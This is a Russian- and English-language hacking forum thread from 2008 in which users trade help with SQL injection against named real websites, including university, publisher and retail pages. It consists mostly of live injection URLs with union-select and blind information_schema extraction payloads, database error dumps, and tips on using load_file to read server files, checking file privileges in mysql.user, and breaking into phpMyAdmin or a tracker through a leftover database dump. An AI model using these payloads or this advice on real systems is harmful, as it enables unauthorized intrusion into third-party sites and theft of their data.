Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Buffalon

    Buffalon Elder - Старейшина

    Joined:
    22 Mar 2008
    Messages:
    241
    Likes Received:
    34
    Reputations:
    8
    http://www.ulsu.ru/news/?i=-0'+union+select+1,2,3,4,5,6,7/*
    Что делать... .
     
  2. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    Там нет скули
    http://www.ulsu.ru/news/?i=2-1
    не равно
    http://www.ulsu.ru/news/?i=1
     
  3. d_x

    d_x Banned

    Joined:
    25 Mar 2008
    Messages:
    558
    Likes Received:
    650
    Reputations:
    210
    maxster, скуля есть, у них просто кривая фильтрация.

    На этом сайте режется символ запятой в id, точнее всё, что после него, и в итоге запрос принимает вид

    -0' union select 1' AND `news_date`<='2' ORDER BY `news_date` DESC,`id`

    Скорее всего, юнионом здесь воспользоваться не получится.
     
  4. Buffalon

    Buffalon Elder - Старейшина

    Joined:
    22 Mar 2008
    Messages:
    241
    Likes Received:
    34
    Reputations:
    8
    Я заметил ... .+ подставляет всякую бяку перед нехорошими символами((
     
  5. caro

    caro New Member

    Joined:
    26 Nov 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    PHP Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'sp.SPECIMEN_ID = 2541 or 1=@@version) -- AND sp.SITENO = si.SITENO'., SQL state 37000 in SQLExecDirect in G:\InetPub\wwwroot\public_site\search.php on line 305 PHP Warning: odbc_fetch_array(): supplied argument is not a valid ODBC result resource in G:\InetPub\wwwroot\public_site\search.php on line 307

    такую ошибку получаю, почему -- не режет запрос? как обойти

    зы с mssql первый раз столкнулся
     
  6. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Помогите с количеством столбцов http://mqup.mcgill.ca/book.php?bookid=-1'
    order by говорит что их 3, но что-то не так
     
  7. lsass.exe

    lsass.exe Elder - Старейшина

    Joined:
    5 Aug 2007
    Messages:
    156
    Likes Received:
    161
    Reputations:
    24
    при 25 выдает полностью запрос

    Error executing the SQL Query : SELECT authors.*, bookauthors.authorType, bookauthors.bookID FROM bookauthors INNER JOIN authors ON bookauthors.authorID = authors.ID WHERE bookauthors.bookID = -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* and authorType = 1
     
  8. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    lsass.exe
    а что толку от этого?

    тут аналогичная канитель(
    http://www.americanmap.com/catalog/browse.php?root_id=24&cat_id=-1+union+select+77777777777777777/*

    вроде столбцов один, но ничего не получается
     
    #1548 truelamer, 6 Apr 2008
    Last edited: 6 Apr 2008
  9. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    xcedz
    Спасибо за совет с подзапросами

    таким способом узнал
    что версия скулы 5
    http://mqup.mcgill.ca/book.php?bookid=1+AND+lower(substring(version(),1,1))='5'

    что есть таблица authors
    http://mqup.mcgill.ca/book.php?bookid=1+AND+lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1))='a'
    ....

    итд

    Все понял буду знать!
     
  10. Lidloses_Auge

    Lidloses_Auge Member

    Joined:
    3 Jan 2008
    Messages:
    6
    Likes Received:
    5
    Reputations:
    5
    Hi,
    what do you do, if you get a SQL Injection, and the version() is < 5.0 ?
    If < 5.0 there isn't any Information_Schema. Do you just guess the right table/column names?
    Load_File is a possibility too, but it doesn't work each time.

    Thank you
     
  11. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Lidloses_Auge
    If I'm not mistaken there is no other way to get some information. You can use lists of table names it'll be like a b-forse)))
    look here for table base
    http://forum.antichat.ru/nextnewesttothread49622.html
     
  12. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    There's no another way to check if a table with current name exists.
    For instance u can write a script which will check them one by one from a dictionary as the chance of some tables' with default names existance is rather high.
     
  13. Lidloses_Auge

    Lidloses_Auge Member

    Joined:
    3 Jan 2008
    Messages:
    6
    Likes Received:
    5
    Reputations:
    5
    I'm just searching for more possibilities of using an injection like:

    load_file
    benchmark
    ascii(lowerstring(substring ....
    information_schema
    into dumpfile

    you know more interesting ways?
     
  14. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Подскажите мне пожалуйста вот когда я использую load_file() я могу сделать так - load_file('/index.php')? и если я так сделаю то я увижу исходник страницы?

    И как вообще узнать что эта функция работает? только если то что я в ней указал вылезит на экран так?
     
  15. Lidloses_Auge

    Lidloses_Auge Member

    Joined:
    3 Jan 2008
    Messages:
    6
    Likes Received:
    5
    Reputations:
    5
    Yes you can, but you've to look in the Sites Source, for the source you want to display.
    E.g.:

    load_file('/index.php')
    then you've to watch the source and look after the index.php.
    In some cases the index.php isn't printed correctly so you've to watch in the source.
    You can also hex-encode the load_file and decrypt it later.
     
    1 person likes this.
  16. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    увидишь, только если в корне есть файл index.php (он там нафиг не нужен)
    В качестве аргумента в эту функцию надо передавать реальный путь, а не относительный (можно конечно и относительный, но толку в этом немного, так как тогда нужно будет указывать путь относительно каталога файлов mysql сервера)

    узнать есть ли файловые привилегии у пользователя можно например так:
    Code:
    union select file_priv from mysql.user where user=left(user(),locate(0x40,user())-1)/*
    но это только если есть доступ к mysql.user

    если нет то только с помошью анализа результата функции, все неудобство в том, что если файла не существует или есть ограничения на чтение файла (например права доступа) то функция возвращает null а не выплевывает ошибки
     
    1 person likes this.
  17. ikolla$$

    ikolla$$ Banned

    Joined:
    6 Apr 2008
    Messages:
    80
    Likes Received:
    27
    Reputations:
    5
    Кароче.Возможно повторп,но прошу не пинать.
    Есть 2 вопроса:
    1)Как можно ломануть phpmyadmin;
    2)Есть трекер.Движко TBDev.Там,на трекере есть папка с файлом дампа Базы Данных.ЕЕ надо удалять после устаовки.Но ее не удалили. помоему там есть права на запись,хотя могу ошбатсо.НУ чем ето может помочь?И вообще кто-нибудь знает как ломать ети двиги?

    -----пример-----
    http://deniska.ath.cx/ - только помоему рабаотает после 14.00 :D
     
  18. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    ikolla$$,
    1)http://milw0rm.com/search.php в строке поиске пишешь phpmyadmin. То же самое можно проделать на securitylab.ru, securityfocus.com и т.д.

    2)Ну попробуй скачать этот дамп и посмотреть что в нем есть интересного. Хотя, имхо, ничего в нем нет интересного, ибо там скорее всего просто дефолтное строение бд без значений, которые потом уже вбивались.
     
    1 person likes this.
  19. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Народ, а как выполнить запрос, если полей там около тысячи ?)))).В URL ведь количество вводимых символов ограничено, потому запрос через юрл никак((

    Пробывал вот POST запрос:

    GET /page.html?id=5 HTTP/1.1
    Accept: */*
    Accept-Language: uk
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SQL_TOOL)
    Host: host.ru
    Connection: Close
    Content-Type: text/html
    Content-Length: 2850

    %20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,55,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,472,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,599,600,601,602,603,604,605,606,607,608,609,610,611,612,613,614,615/*

    Что я сделал не так? Объясните пожалуйста)).Сайт сказать не могу, ибо сам хочу попробывать ))
     
  20. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    помогите разобраться с такой ересью )
    http://www.9000rpm.ru/service.html?id=1+group+by+4/*
    нету выводимых полей
     
Thread Status:
Not open for further replies.